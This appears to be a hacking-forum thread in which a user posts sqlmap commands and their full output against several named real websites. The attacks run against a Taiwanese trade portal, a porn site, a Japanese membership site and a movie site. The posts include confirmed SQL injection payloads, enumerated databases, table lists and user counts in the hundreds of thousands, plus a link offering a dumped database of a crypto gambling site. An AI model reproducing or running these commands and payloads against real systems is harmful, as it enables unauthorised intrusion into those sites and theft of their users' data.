SQL injections and other vulnerabilities that I find and have no use with it

MrDark · 25.09.2025

taiwan

Код:

(myenv) root@dark3:~# sqlmap -u "https://tradeserv.com/NewInquiry/inquiry.php?TB_iframe=true&height=550&keepThis=true&to[]=/metal/wilin/05etw&type=product&width=700"   -p "to[]"   --batch   --level=3   --risk=2   --random-agent    --timeout=60 --dbs --count --threads=10
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.9.9#pip}
|_ -| . ["]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 07:19:27 /2025-09-18/

[07:19:27] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Windows; U; Win98; fr-FR; rv:1.7.6) Gecko/20050318 Firefox/1.0.2' from file '/root/myenv/lib/python3.12/site-packages/sqlmap/data/txt/user-agents.txt'
[07:19:27] [INFO] resuming back-end DBMS 'mysql'
[07:19:28] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=v1k5l6fnvim...85ig3dohn0'). Do you want to use those [Y/n] Y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: to[] (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
    Payload: TB_iframe=true&height=550&keepThis=true&to[]=/metal/wilin/05etw') AND 2501=(SELECT (CASE WHEN (2501=2501) THEN 2501 ELSE (SELECT 9269 UNION SELECT 5848) END))-- Hhjs&type=product&width=700

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: TB_iframe=true&height=550&keepThis=true&to[]=/metal/wilin/05etw') AND (SELECT 3807 FROM (SELECT(SLEEP(5)))rqqG) AND ('Dzsj'='Dzsj&type=product&width=700

    Type: UNION query
    Title: Generic UNION query (NULL) - 8 columns
    Payload: TB_iframe=true&height=550&keepThis=true&to[]=/metal/wilin/05etw') UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x71786a7871,0x776869426868506b5441546d486d626e494944787a754c4a4d51635849635574454b7275736b6b63,0x71766a7a71),NULL,NULL,NULL-- -&type=product&width=700
---
[07:19:32] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 6
web application technology: PHP, PHP 5.6.40, Apache 2.2.15
back-end DBMS: MySQL >= 5.0.12
[07:19:32] [INFO] fetching database names
[07:19:33] [INFO] starting 10 threads
available databases [147]:
[*] _
[*] adwords-contract
[*] allproduct_sync
[*] apoc_for_show
[*] apoc_new
[*] APOC_SRC
[*] apoc_sync_bak
[*] bania
[*] banner
[*] bbs
[*] bike_maxway
[*] chemical_kuanyo
[*] communication_changway
[*] construction_shannfarn
[*] consumer_kaijie
[*] contracts
[*] crm
[*] crmtest
[*] dashboard
[*] ee_beie
[*] ee_cableassembly
[*] ee_chuntai
[*] ee_clearcast
[*] ee_coretech
[*] ee_ecluster
[*] ee_goldley
[*] ee_gp_1
[*] ee_joint_1
[*] ee_kaisergood
[*] ee_kingship
[*] ee_matsutek
[*] ee_oka
[*] ee_powerwin
[*] ee_rueyshing
[*] ee_selmag
[*] ee_tecpel
[*] ee_theil
[*] ee_wanshun
[*] environment_booster
[*] food_fwusow
[*] furniture_euro
[*] gift_chiefling
[*] golden_google
[*] hotgroup
[*] household_multiply
[*] household_pookoo
[*] information_schema
[*] iproduct1
[*] kouryuu_monitoring
[*] kouryuu_monitoring1
[*] livehelp
[*] livehelp32
[*] machine_askme
[*] machine_changyong
[*] machine_chiaming
[*] machine_chyanjye
[*] machine_eyan
[*] machine_haoyu
[*] machine_hundred
[*] machine_jingduann
[*] machine_juyen
[*] machine_lehyeh
[*] machine_lienying
[*] machine_pulian_1
[*] machine_spc
[*] machine_sunrise
[*] machine_taijune
[*] machine_wuli
[*] machine_wuli-1
[*] machine_yitung
[*] manufacture13_uta
[*] manufacture4_cse
[*] medical_cambus
[*] medical_leaptong
[*] medical_wandy
[*] metal_aerohose
[*] metal_alfot
[*] metal_dingten
[*] metal_holiban
[*] metal_lungyun
[*] metal_mingyang
[*] metal_pochwen
[*] metal_shengwei
[*] metal_smartcnc
[*] metal_strongchung
[*] metal_ucando
[*] metal_ylss
[*] mrtg
[*] musical_cadeson
[*] mysql
[*] openads
[*] openx
[*] parksonold
[*] phpmyadmin
[*] phpOpenTracker
[*] plastic_darchie
[*] PR
[*] reg
[*] rob
[*] search
[*] security_aecl
[*] seo
[*] showcase_keywood
[*] showcase_parkson
[*] songoDB
[*] special_alan
[*] special_david
[*] special_jerry
[*] special_kimi
[*] special_leo
[*] special_ningbo
[*] special_shanghai
[*] special_wep5
[*] special_willis
[*] special_xiamen
[*] special_yot
[*] sports_active
[*] sports_diamond
[*] sports_evaglory
[*] sports_leisureking_1
[*] sports_wever
[*] tami_anko
[*] tami_bigstone
[*] tami_chuanfan_1
[*] temptables
[*] test
[*] tool_parget_1
[*] tool_three_in_one1
[*] tool_three_in_one2
[*] tool_three_in_one3
[*] tool_three_in_one4
[*] tool_twairboss
[*] tool_witman
[*] tradeshow
[*] traffic_clutch
[*] traffic_cryomax
[*] traffic_hushan
[*] traffic_ignition_1
[*] traffic_safeguard
[*] traffic_sanemech
[*] traffic_siglite
[*] tungBlog
[*] vivvo
[*] vivvo_pr
[*] wordpress233
[*] zipper_cds
[*] zipper_cds-1

MrDark · 25.09.2025

Crypto

https://crashgambler.io/crashgambler.io.sql

108111118101 · 26.09.2025

Good job MrDark!

MrDark · 28.09.2025

Database: indian_db
+--------+---------+
| Table | Entries |
+--------+---------+
| user | 478888 |
+--------+---------+

Код:

available databases [2]:
[*] indian_db
[*] information_schema


Database: indian_db
[52 tables]
+-------------------------+
| log                     |
| parse_info_p\x81rn_com  |
| parse_info_xham\x81os   |
| source                  |
| sphinx_cou\x04\x01ter   |
| t\x81pe_blacklist       |
| user                    |
| blacklist_last_search   |
| blacklist_search        |
| category                |
| deleted_videos          |
| dengi                   |
| last_update             |
| log_vote                |
| new_pictures_last_id    |
| parse_info              |
| parse_info_myindianporn |
| parse_info_pornhub      |
| parse_info_xhamster     |
| site                    |
| subnet_list             |
| support_message         |
| telegram_channel        |
| telegram_posting        |
| update_db_2067          |
| update_db_2395          |
| user_favorites          |
| user_last_views         |
| user_visit              |
| video                   |
| video_bn                |
| video_category          |
| video_copy              |
| video_copy__            |
| video_copy_new          |
| video_gu                |
| video_hi                |
| video_kn                |
| video_ml                |
| video_mr                |
| video_pa                |
| video_ta                |
| video_te                |
| video_text_bn           |
| video_text_gu           |
| video_text_kn           |
| video_text_ml           |
| video_text_mr           |
| video_text_pa           |
| video_text_ta           |
| video_text_te           |
| vote_video              |
+-------------------------+

Код:

(myenv) root@cccc:~# sqlmap -u "https://justindianporn.info/ajax/auth.php" --data "login=e&loginRequest=true&password=" -p login --cookie "bad_vote_124777=true; bad_v         ote_157209=true; bad_vote_170=true; bad_vote_216570=true; bad_vote_23989=true; bad_vote_261809=true; bad_vote_275706=true; bad_vote_276601=true; bad_vote_27988=true;          bad_vote_28158=true; bad_vote_28267=true; bad_vote_28587=true; bad_vote_297076=true; bad_vote_31298=true; bad_vote_31600=true; bad_vote_31645=true; bad_vote_318793=tr         ue; bad_vote_327=true; bad_vote_351550=true; bad_vote_450335=true; bad_vote_458155=true; bad_vote_473462=true; bad_vote_54123=true; bad_vote_54783=true; bad_vote_5751         6=true; bad_vote_57854=true; bad_vote_59=true; bad_vote_62053=true; bad_vote_63029=true; bad_vote_65133=true; bad_vote_67891=true; bad_vote_94680=true; good_vote_1162         36=true; good_vote_124777=true; good_vote_157209=true; good_vote_170=true; good_vote_216570=true; good_vote_23989=true; good_vote_261809=true; good_vote_275706=true;          good_vote_276601=true; good_vote_27988=true; good_vote_28158=true; good_vote_28179=true; good_vote_28267=true; good_vote_28587=true; good_vote_297076=true; good_vote_         31298=true; good_vote_31600=true; good_vote_31645=true; good_vote_318793=true; good_vote_327=true; good_vote_351550=true; good_vote_450335=true; good_vote_458155=true         ; good_vote_473462=true; good_vote_54123=true; good_vote_54783=true; good_vote_57516=true; good_vote_57854=true; good_vote_59=true; good_vote_62053=true; good_vote_63         029=true; good_vote_65133=true; good_vote_67891=true; good_vote_94680=true; list=[31298,63029,54123,67891,59,31645,65133,28158,28267,31600,57854,28587,62053,54783,327         ,23989,57516,170,27988,28179,44445,53624,28208,54234,63114,191,28393,44347,44319,28388,56475,31884,28302]" --referer "https://justindianporn.info/" --headers "X-Reque         sted-With: XMLHttpRequest" --dbms mysql --risk 3 --level 3 --batch
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.9.9#pip}
|_ -| . [(]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local,          state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 05:51:27 /2025-09-27/

[05:51:28] [INFO] testing connection to the target URL
[05:51:28] [INFO] checking if the target is protected by some kind of WAF/IPS
[05:51:29] [INFO] testing if the target URL content is stable
[05:51:29] [INFO] target URL content is stable
[05:51:29] [WARNING] heuristic (basic) test shows that POST parameter 'login' might not be injectable
[05:51:29] [INFO] testing for SQL injection on POST parameter 'login'
[05:51:29] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[05:51:34] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'
[05:51:47] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT)'
[05:51:53] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (subquery - comment)'
[05:51:56] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (subquery - comment)'
[05:52:02] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (comment)'
[05:52:05] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (comment)'
[05:52:12] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[05:52:12] [INFO] testing 'Boolean-based blind - Parameter replace (DUAL)'
[05:52:12] [INFO] testing 'Boolean-based blind - Parameter replace (DUAL - original value)'
[05:52:13] [INFO] testing 'Boolean-based blind - Parameter replace (CASE)'
[05:52:13] [INFO] testing 'Boolean-based blind - Parameter replace (CASE - original value)'
[05:52:13] [INFO] testing 'HAVING boolean-based blind - WHERE, GROUP BY clause'
[05:52:18] [INFO] testing 'Generic inline queries'
[05:52:18] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[05:52:21] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[05:52:28] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)'
[05:52:31] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
[05:52:36] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[05:52:41] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[05:52:53] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[05:52:53] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[05:52:54] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[05:52:54] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[05:52:59] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[05:53:04] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[05:53:09] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[05:53:14] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[05:53:19] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[05:53:24] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[05:53:29] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)'
[05:53:34] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[05:53:39] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[05:53:39] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[05:53:40] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (EXTRACTVALUE)'
[05:53:40] [INFO] testing 'MySQL >= 4.1 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[05:53:41] [INFO] testing 'MySQL inline queries'
[05:53:41] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[05:53:44] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[05:53:49] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[05:53:51] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[05:53:54] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[05:54:05] [INFO] POST parameter 'login' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (3) value? [Y/n] Y
[05:54:05] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[05:54:05] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[05:54:09] [INFO] testing 'Generic UNION query (random number) - 1 to 20 columns'
[05:54:13] [INFO] testing 'Generic UNION query (NULL) - 21 to 40 columns'
[05:54:16] [INFO] testing 'Generic UNION query (random number) - 21 to 40 columns'
[05:54:19] [INFO] testing 'Generic UNION query (NULL) - 41 to 60 columns'
[05:54:22] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[05:54:26] [INFO] testing 'MySQL UNION query (random number) - 1 to 20 columns'
[05:54:30] [INFO] testing 'MySQL UNION query (NULL) - 21 to 40 columns'
[05:54:33] [INFO] testing 'MySQL UNION query (random number) - 21 to 40 columns'
[05:54:36] [INFO] testing 'MySQL UNION query (NULL) - 41 to 60 columns'
[05:54:39] [INFO] checking if the injection point on POST parameter 'login' is a false positive
POST parameter 'login' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 822 HTTP(s) requests:
---
Parameter: login (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: login=e' AND (SELECT 6816 FROM (SELECT(SLEEP(5)))RWjy)-- ZwvN&loginRequest=true&password=
---
[05:55:20] [INFO] the back-end DBMS is MySQL
[05:55:20] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
back-end DBMS: MySQL >= 5.0.12
[05:55:22] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/justindianporn.info'

[*] ending @ 05:55:22 /2025-09-27/

MrDark · 28.09.2025

Код:

(myenv) root@E02S29:~# sqlmap -u "https://vi-vo.link/module/member_menu.php" --data="code=94102&pass=u]H[ww6KrA9F.x-F&s_type=1&type=1" -p code --level=3 --risk=2 --batch --dbs --random-agent
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.9.9#pip}
|_ -| . [(]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 07:41:03 /2025-09-27/

[07:41:03] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1b3pre) Gecko/20090105 Firefox/3.1b3pre' from file '/root/myenv/lib/python3.12/site-packages/sqlmap/data/txt/user-agents.txt'
[07:41:03] [INFO] testing connection to the target URL
got a 302 redirect to 'https://vi-vo.link/module/user_login.php?error_msg=%E4%BC%9A%E5%93%A1ID%E3%80%81%E3%83%91%E3%82%B9%E3%83%AF%E3%83%BC%E3%83%89%E3%81%AB%E8%AA%A4%E3%82%8A%E3%81%8C%E3%81%82%E3%82%8A%E3%81%BE%E3%81%99&guid_get='. Do you want to follow? [Y/n] Y
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [Y/n] Y
you have not declared cookie(s), while server wants to set its own ('AWSALB=t64RvvhcxSn.../UT64e28Sg;AWSALBCORS=t64RvvhcxSn.../UT64e28Sg;ssid=gj398snrjes...sgk25oktvo'). Do you want to use those [Y/n] Y
[07:41:06] [INFO] checking if the target is protected by some kind of WAF/IPS
[07:41:08] [CRITICAL] heuristics detected that the target is protected by some kind of WAF/IPS
are you sure that you want to continue with further target testing? [Y/n] Y
[07:41:08] [WARNING] please consider usage of tamper scripts (option '--tamper')
[07:41:08] [INFO] testing if the target URL content is stable
[07:41:13] [WARNING] heuristic (basic) test shows that POST parameter 'code' might not be injectable
[07:41:17] [INFO] testing for SQL injection on POST parameter 'code'
[07:41:17] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[07:42:09] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (subquery - comment)'
[07:42:35] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (comment)'
[07:42:55] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[07:43:22] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (Microsoft Access comment)'
[07:43:49] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
[07:44:36] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[07:45:25] [INFO] testing 'PostgreSQL AND boolean-based blind - WHERE or HAVING clause (CAST)'
[07:46:12] [INFO] testing 'Oracle AND boolean-based blind - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)'
[07:47:03] [INFO] testing 'SQLite AND boolean-based blind - WHERE, HAVING, GROUP BY or HAVING clause (JSON)'
[07:47:53] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[07:47:55] [INFO] testing 'PostgreSQL boolean-based blind - Parameter replace'
[07:47:57] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - Parameter replace'
[07:47:59] [INFO] testing 'Oracle boolean-based blind - Parameter replace'
[07:48:01] [INFO] testing 'Informix boolean-based blind - Parameter replace'
[07:48:03] [INFO] testing 'Microsoft Access boolean-based blind - Parameter replace'
[07:48:05] [INFO] testing 'Boolean-based blind - Parameter replace (DUAL)'
[07:48:08] [INFO] testing 'Boolean-based blind - Parameter replace (DUAL - original value)'
[07:48:08] [INFO] testing 'Boolean-based blind - Parameter replace (CASE)'
[07:48:10] [INFO] testing 'Boolean-based blind - Parameter replace (CASE - original value)'
[07:48:10] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[07:48:14] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[07:48:14] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[07:48:14] [INFO] testing 'PostgreSQL boolean-based blind - ORDER BY, GROUP BY clause'
[07:48:18] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause'
[07:48:23] [INFO] testing 'Oracle boolean-based blind - ORDER BY, GROUP BY clause'
[07:48:27] [INFO] testing 'HAVING boolean-based blind - WHERE, GROUP BY clause'
[07:49:17] [INFO] testing 'PostgreSQL boolean-based blind - Stacked queries'
[07:49:43] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - Stacked queries (IF)'
[07:50:09] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[07:50:32] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[07:50:55] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[07:51:18] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[07:51:41] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[07:52:04] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[07:52:27] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (CONVERT)'
[07:52:50] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (CONCAT)'
[07:53:13] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[07:53:36] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS)'
[07:53:59] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)'
[07:54:22] [INFO] testing 'Firebird AND error-based - WHERE or HAVING clause'
[07:54:45] [INFO] testing 'MonetDB AND error-based - WHERE or HAVING clause'
[07:55:08] [INFO] testing 'Vertica AND error-based - WHERE or HAVING clause'
[07:55:32] [INFO] testing 'IBM DB2 AND error-based - WHERE or HAVING clause'
[07:55:55] [INFO] testing 'ClickHouse AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[07:56:42] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[07:57:05] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[07:57:06] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[07:57:07] [INFO] testing 'PostgreSQL error-based - Parameter replace'
[07:57:08] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Parameter replace'
[07:57:09] [INFO] testing 'Oracle error-based - Parameter replace'
[07:57:10] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (EXTRACTVALUE)'
[07:57:13] [INFO] testing 'MySQL >= 4.1 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[07:57:15] [INFO] testing 'PostgreSQL error-based - ORDER BY, GROUP BY clause'
[07:57:17] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Stacking (EXEC)'
[07:57:29] [INFO] testing 'Generic inline queries'
[07:57:31] [INFO] testing 'MySQL inline queries'
[07:57:32] [INFO] testing 'PostgreSQL inline queries'
[07:57:33] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[07:57:34] [INFO] testing 'Oracle inline queries'
[07:57:35] [INFO] testing 'SQLite inline queries'
[07:57:36] [INFO] testing 'Firebird inline queries'
[07:57:37] [INFO] testing 'ClickHouse inline queries'
[07:57:39] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[07:57:52] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[07:58:15] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[07:58:27] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[07:58:40] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[07:58:52] [INFO] testing 'PostgreSQL stacked queries (heavy query - comment)'
[07:59:05] [INFO] testing 'PostgreSQL < 8.2 stacked queries (Glibc - comment)'
[07:59:18] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[07:59:43] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (DECLARE - comment)'
[07:59:56] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[08:00:09] [INFO] testing 'Oracle stacked queries (heavy query - comment)'
[08:00:21] [INFO] testing 'IBM DB2 stacked queries (heavy query - comment)'
[08:00:34] [INFO] testing 'SQLite > 2.0 stacked queries (heavy query - comment)'
[08:00:46] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[08:01:09] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP)'
[08:01:50] [INFO] POST parameter 'code' appears to be 'MySQL >= 5.0.12 AND time-based blind (SLEEP)' injectable
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (3) and risk (2) values? [Y/n] Y
[08:01:50] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[08:01:50] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[08:02:15] [INFO] testing 'Generic UNION query (random number) - 1 to 20 columns'
[08:02:40] [INFO] testing 'Generic UNION query (NULL) - 21 to 40 columns'
[08:03:01] [INFO] testing 'Generic UNION query (random number) - 21 to 40 columns'
[08:03:22] [INFO] testing 'Generic UNION query (NULL) - 41 to 60 columns'
[08:03:43] [INFO] checking if the injection point on POST parameter 'code' is a false positive
POST parameter 'code' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 1085 HTTP(s) requests:
---
Parameter: code (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SLEEP)
    Payload: code=94102' AND SLEEP(5) AND 'TuUX'='TuUX&pass=u]H[ww6KrA9F.x-F&s_type=1&type=1
---
[08:04:59] [INFO] the back-end DBMS is MySQL
[08:04:59] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
web application technology: Apache
back-end DBMS: MySQL >= 5.0.12 (Aurora fork)
[08:05:19] [INFO] fetching database names
[08:05:19] [INFO] fetching number of databases
[08:05:19] [INFO] retrieved:
[08:05:22] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[08:05:22] [ERROR] unable to retrieve the number of databases
[08:05:22] [INFO] falling back to current database
[08:05:22] [INFO] fetching current database
[08:05:22] [INFO] retrieved:
[08:05:37] [INFO] adjusting time delay to 4 seconds due to good response times
prog
available databases [1]:
[*] prog

[08:07:38] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/vi-vo.link'

[*] ending @ 08:07:38 /2025-09-27/

MrDark · 29.09.2025

Database: admin_movie
+-----------+---------+
| Table | Entries |
+-----------+---------+
| customers | 196168 |
| users | 3 |
+-----------+---------+

Код:

(myenv) root@E02S29:~# sqlmap -u "https://ge.movie/profile/rating"   --data="action=set_rating&id=1993&rating=2&type=movie"   -p id   --cookie="auth=%7B%22id%22%3A%22195503%22%2C%22avatar%22%3A%22%5C%2Ftheme%5C%2Fweb%5C%2Fimg%5C%2F2.svg%22%2C%22name%22%3A%22pHqghUme%22%2C%22surname%22%3A%22%22%2C%22sex%22%3A%222%22%2C%22nickname%22%3Anull%2C%22email%22%3A%22testing%40example.com%22%7D; cf_clearance=sUojhqTnRxJ.AhbS91pESXaAY.GlQf1c63ZAHq5rHXE-1759047251-1.2.1.1-iiMUEqozkoIDe8w7wDAbEr5zlXb5fF02333jNDD_qbRyYvCCiOIG76dtTbAGehkagkw7tX9QW5mmM1ypX7diYxX2PaiUSyRfXorEFGgWVmTFQv2SaWmJw7VXLY8BDqDSSpmcD_HXhO.4MsKY1BC69pv3csTs8Ml_H2a8Nysmip.1kU4NWTGitvves94JqgnDS5NnD0PN9lSleDC_MTVGs4HDZPLipCUkPzsQncpomMA; ci_session=18edgs67pomjisip88v5obio6opsvu92; ref=https%3A%2F%2Fge.movie%2F"   --headers="X-Requested-With: XMLHttpRequest"   --referer="https://ge.movie/"   --dbms=mysql   --level=5   --risk=3   --batch --tamper=space2comment,between --random-agent --dbs --threads=10
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.9.9#pip}
|_ -| . [,]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 05:38:16 /2025-09-29/

[05:38:16] [INFO] loading tamper module 'space2comment'
[05:38:16] [INFO] loading tamper module 'between'
it appears that you might have mixed the order of tamper scripts. Do you want to auto resolve this? [Y/n/q] Y
[05:38:16] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.173.1 Safari/530.5' from file '/root/myenv/lib/python3.12/site-packages/sqlmap/data/txt/user-agents.txt'
[05:38:16] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
    Payload: action=set_rating&id=1993' OR NOT 4225=4225 AND 'GyIM'='GyIM&rating=2&type=movie

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: action=set_rating&id=1993' AND (SELECT 2817 FROM (SELECT(SLEEP(5)))oeok) AND 'oawa'='oawa&rating=2&type=movie
---
